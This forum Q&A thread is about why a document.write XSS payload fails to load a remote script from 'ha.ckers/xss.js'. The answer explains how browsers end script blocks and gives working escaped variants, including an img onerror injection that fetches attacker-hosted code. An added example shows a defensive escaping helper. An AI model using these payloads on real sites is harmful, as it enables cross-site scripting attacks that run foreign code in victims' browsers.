How do I load an external .js script using this syntax?
<script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>
For all those wondering, I set up a test form I made purposely vulnerable, but I couldn't get this to launch, and yes, I know:
<script src=//ha.ckers/xss.js></script>
could easily work, but I'm just trying to figure out how I could do it using document.write.
Thanks to anyone who is able to help me.
//Edit
Why doesn't this work?
<img src=x onerror=document.write('<script src="http://ha.ckers/xss.js"><\/script>')>
- You have to escape the </script> tag: <\/script> - otherwise the compiler will end the JS with that tag and not with the right one – Niccolò Campolungo Commented Jul 3, 2013 at 22:16
1 Answer
What you have to remember is that what lies within the <script>....</script> tags is opaque to the browser. Its job is, having seen <script>, to gather up everything largely without parsing it until it sees </script> and then hand that intervening text off to the JavaScript engine.
In your case, what it sees between <script> and </script> is:
document.write('<script src=http://ha.ckers/xss.js>
...which obviously results in a syntax error. That's because the first </script> terminates the first <script>:
<script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->
You have to break it up so it's not the literal sequence </script>. There are lots of ways to do that. Add a \:
<script>document.write('<script src=http://ha.ckers/xss.js><\/script>')</script>
or break the string:
<script>document.write('<script src=http://ha.ckers/xss.js></scr' + 'ipt>')</script>
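The rule the answer describes, as an added example that is not part of the original answer: a simplified model of where the browser ends an inline script, run over the answer's three forms with a placeholder URL. It goes one step beyond the answer with a hypothetical helper, toInlineScriptLiteral, which applies the same rule to data a server writes into an inline script.

```javascript
// Added example (not from the original post). Simplified model of HTML
// "script data" tokenizing: the element's text ends at the first "</script"
// followed by whitespace, "/" or ">", matched case-insensitively, with no
// knowledge of JavaScript quoting. Assumption: legacy "<!--" states ignored.
const SCRIPT_END = /<\/script[\t\n\f\r \/>]/i;

// Text the browser hands to the JS engine, given everything after "<script>".
function scriptBody(rest) {
  const m = SCRIPT_END.exec(rest);
  return m === null ? rest : rest.slice(0, m.index);
}

// True if `body` compiles as JavaScript. Function() only parses; nothing runs.
function parses(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    if (e.name === "SyntaxError") return false;
    throw e;
  }
}

// Hypothetical helper: serialize a value for embedding in an inline script.
// Writing "<" as \u003c keeps "</script" out of the emitted text entirely.
function toInlineScriptLiteral(value) {
  return JSON.stringify(value).replace(/</g, "\\u003c");
}

// Constructed inputs: the three forms from the answer, placeholder URL.
const SRC = "https://example.test/app.js";
const variants = {
  literal: `document.write('<script src=${SRC}></script>')</script>`,
  backslash: `document.write('<script src=${SRC}><\\/script>')</script>`,
  split: `document.write('<script src=${SRC}></scr' + 'ipt>')</script>`,
};

function report() {
  const out = {};
  for (const [name, rest] of Object.entries(variants)) {
    const body = scriptBody(rest);
    out[name] = { body, ok: parses(body) };
  }
  return out;
}

console.log(report());
```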